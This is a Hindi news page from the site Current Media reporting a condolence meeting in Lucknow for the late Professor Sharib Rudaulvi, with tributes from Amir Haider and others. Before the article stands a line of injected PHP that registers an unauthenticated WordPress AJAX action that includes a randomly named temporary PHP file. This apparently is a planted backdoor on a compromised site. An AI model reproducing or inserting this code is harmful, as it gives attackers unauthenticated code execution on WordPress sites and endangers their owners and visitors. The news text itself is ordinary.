if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }"शारिब रुदौलवी" के जाने से इंसानियत का बड़ा नुकसान - अमीर हैदर - Current Media

“शारिब रुदौलवी” के जाने से इंसानियत का बड़ा नुकसान – अमीर हैदर

लखनऊ। लखनऊ की शायद ही कोई ऐसी अदबी महफिल हो जिसमें रुदौलवी साहब की हाज़िरी न होती हो । कोई भी अदबी महफिल उनके बगैर अधूरी मानी जाती थी यह कहना है पुराने कांग्रेसी नेता चचा अमीर हैदर का । प्रोफेसर शारिब रुदौलवी का इंतिकाल 18 अक्तूबर की सुबह एक अस्पताल में हो गया उनकी उम्र 88 वर्ष थी।

चचा अमीर हैदर की अध्यक्षता में एक शोक सभा का आयोजन किया गया जिसमें मशहूर दानिशवर ,समाजसेवी व शिक्षाविद मरहूम शारिब रुदौलवी साहब को याद करते हुए उन्हें खिराजे अकीदत पेश किया गया । चचा ने कहा कि शारिब रुदौलवी साहब सन 2000 में जवाहरलाल यनिवसिर्टी से रिटायर होने के बाद शिक्षा के क्षेत्र में लगातार काम करते रहे । उन्होनें गरीब बच्चों को पढ़ाने के लिए कालेज खोला और पूरी लगन के साथ समाज के कमजोर तबके को शिक्षा से जोड़कर आगे बढ़ाने का लगातार प्रयास करते रहे । उनके जाने से पूरी इंसानियत का नुकसान हुआ है ।
सीनियर सहाफी उबैद नासिर ने कहा कि शारिब रुदौलवी साहब के साथ बैठकर टाईम का अंदाजा ही लगता है कि कब इतना वक्त गुज़र गया उनकी शख्सियत ऐसी थी कि उनके मिलने वाले वक्त का अंदाजा ही नहीं लगा पाते थे । इसके साथ-साथ शारिब रुदौलवी अदब के मैदान में भी एक जानी मानी शख्सियत थे उनके जाने से न सिर्फ समाज बल्कि पूरी अदबी दुनिया का भारी नुकसान हुआ है ।
शोक सभा में उपस्थित लोगों में सीनियर सहाफी उबैद नासिर, हुमायूॅं चैधरी, नदीम उद्दीन, मेराजवली,तारिक़ खान,प्रदीप कपूर आदि ने मरहूम की आत्मा की शान्ति के लिए दुआ की।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

संयुक्त राष्ट्र सतत विकास लक्ष्यों में उत्कृष्ट योगदान के लिए ‘वायरसडीज़ीज़’ जर्नल सम्मानित

लखनऊ। मो0 ज़ाहिद । स्प्रिंगर नेचर द्वारा प्रकाशित अंतरराष्ट्रीय पीयर-रिव्यूड जर्नल इंडियान वायरोलॉजिकल सोसाइटी केे …